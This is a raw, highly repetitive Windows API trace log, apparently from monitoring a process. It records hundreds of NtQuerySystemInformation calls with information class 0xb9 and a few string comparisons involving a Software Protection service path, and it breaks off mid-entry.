[0277.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd820, Length=0x28, ResultLength=0x0) [0277.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.144] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0277.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd700, Length=0x20, ResultLength=0x0) [0277.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x20, ResultLength=0x0) [0277.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0277.145] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd710, Length=0x20, ResultLength=0x0) [0277.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.146] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb10, Length=0x28, ResultLength=0x0) [0277.147] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0277.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.147] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.154] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd960, Length=0x28, ResultLength=0x0) [0277.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.155] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.156] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0277.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.158] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0277.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0277.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.159] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0277.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0277.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0277.160] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb10, Length=0x28, ResultLength=0x0) [0277.161] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0277.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.161] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdb90, Length=0x50, ResultLength=0x0) [0277.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.162] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8f0, Length=0x28, ResultLength=0x0) [0277.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.166] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd960, Length=0x28, ResultLength=0x0) [0277.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.167] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0277.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.169] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9e0, Length=0x28, ResultLength=0x0) [0277.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.170] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0277.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8c0, Length=0x20, ResultLength=0x0) [0277.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdac0, Length=0x38, ResultLength=0x0) [0277.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd940, Length=0x20, ResultLength=0x0) [0277.171] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0277.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd8d0, Length=0x20, ResultLength=0x0) [0277.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.172] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.174] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fe1a0, Length=0x40, ResultLength=0x0) [0277.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.175] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd890, Length=0x50, ResultLength=0x0) [0277.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.219] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd890, Length=0x50, ResultLength=0x0) [0277.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd890, Length=0x50, ResultLength=0x0) [0277.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0277.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0277.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0277.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd780, Length=0x50, ResultLength=0x0) [0277.220] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.221] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0277.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.223] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0277.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0277.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0277.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4e0, Length=0x28, ResultLength=0x0) [0277.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.224] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd550, Length=0x28, ResultLength=0x0) [0277.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.225] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0277.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.226] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd5d0, Length=0x28, ResultLength=0x0) [0277.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.229] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd5d0, Length=0x28, ResultLength=0x0) [0277.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd470, Length=0x20, ResultLength=0x0) [0277.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd3f0, Length=0x20, ResultLength=0x0) [0277.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd3f0, Length=0x20, ResultLength=0x0) [0277.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd3f0, Length=0x20, ResultLength=0x0) [0277.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.230] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0277.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd6b0, Length=0x38, ResultLength=0x0) [0277.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd530, Length=0x20, ResultLength=0x0) [0277.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4c0, Length=0x20, ResultLength=0x0) [0277.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.231] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd4c0, Length=0x20, ResultLength=0x0) [0277.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.232] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fdae0, Length=0x50, ResultLength=0x0) [0277.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.233] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd9d0, Length=0x50, ResultLength=0x0) [0277.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0277.234] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a68fd900, Length=0x38, ResultLength=0x0) [0277.239] NtQuerySystemInformation 